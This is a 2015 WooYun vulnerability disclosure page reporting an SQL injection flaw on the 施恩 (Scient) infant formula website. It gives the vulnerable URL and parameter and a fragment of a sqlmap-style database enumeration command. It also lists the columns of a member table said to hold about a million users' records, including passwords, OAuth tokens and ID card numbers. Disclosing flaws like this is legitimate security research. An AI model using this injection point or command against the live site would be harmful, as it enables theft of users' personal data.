施恩奶粉存在SQL注入漏洞#泄露大量用户信息 | wooyun-2015-0157499 | WooYun.org

当前位置：WooYun >> 漏洞信息

漏洞概要关注数(24) 关注此漏洞

缺陷编号：

wooyun-2015-0157499

漏洞标题：

施恩奶粉存在SQL注入漏洞#泄露大量用户信息

相关厂商：

施恩奶粉

漏洞作者：

路人甲

提交时间：

2015-12-03 21:41

修复时间：

2016-01-17 21:42

公开时间：

2016-01-17 21:42

漏洞类型：

SQL注射漏洞

危害等级：

高

自评Rank：

10

漏洞状态：

未联系到厂商或者厂商积极忽略

漏洞来源：

http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：

无

分享漏洞：

>

漏洞详情

披露状态：

2015-12-03：积极联系厂商并且等待厂商认领中，细节不对外公开
2016-01-17：厂商已经主动忽略漏洞，细节向公众公开

简要描述：

RT

详细说明：

存在sql注入泄露大量会员信息

漏洞证明：

http://www.scient.com.cn/product/product-index.php?ProductTypeID=3

存在sql注入泄露大量会员信息
证明截图

可以看到 member2013这个表内有一百万左右会员信息
"http://www.scient.com.cn/product/product-i
ndex.php?ProductTypeID=3" -D wwwscient_scient -T member2013 --columns
表内的信息有
| Column | Type |
+-----------------+--------------+
| AddressInfo | varchar(200) |
| BabyName | varchar(50) |
| BabyTran | varchar(50) |
| BirthDay | varchar(50) |
| CityAddress | varchar(100) |
| CommandName | varchar(50) |
| Email | varchar(100) |
| IP | varchar(50) |
| IPAddress | varchar(100) |
| IsAcceptProduct | int(11) |
| IsActiveEmail | int(11) |
| IsEnable | int(11) |
| IsSex | int(11) |
| LastDate | datetime |
| LoginName | varchar(100) |
| LoginPwd | varchar(100) |
| Member2013ID | int(11) |
| MemberTypeID | int(11) |
| Mobile | varchar(50) |
| NickName | varchar(100) |
| NowSelPinPai | varchar(50) |
| OauthToken | varchar(200) |
| OauthTokenSecre | varchar(200) |
| ParentName | varchar(50) |
| Phone | varchar(50) |
| RegDate | datetime |
| SelServices | varchar(50) |
| Tel | varchar(50) |
| UserCard | varchar(100) |
| UserName | varchar(100) |
| WeiboHead | varchar(200) |
| WeiBoID | varchar(100) |
| WeiboUrl | varchar(200) |
| ZipCode | varchar(50) |
+-----------------+--------------+

修复方案：

恩

版权声明：转载请注明来源路人甲@乌云

>

漏洞回应

厂商回应：

未能联系到厂商或者厂商积极拒绝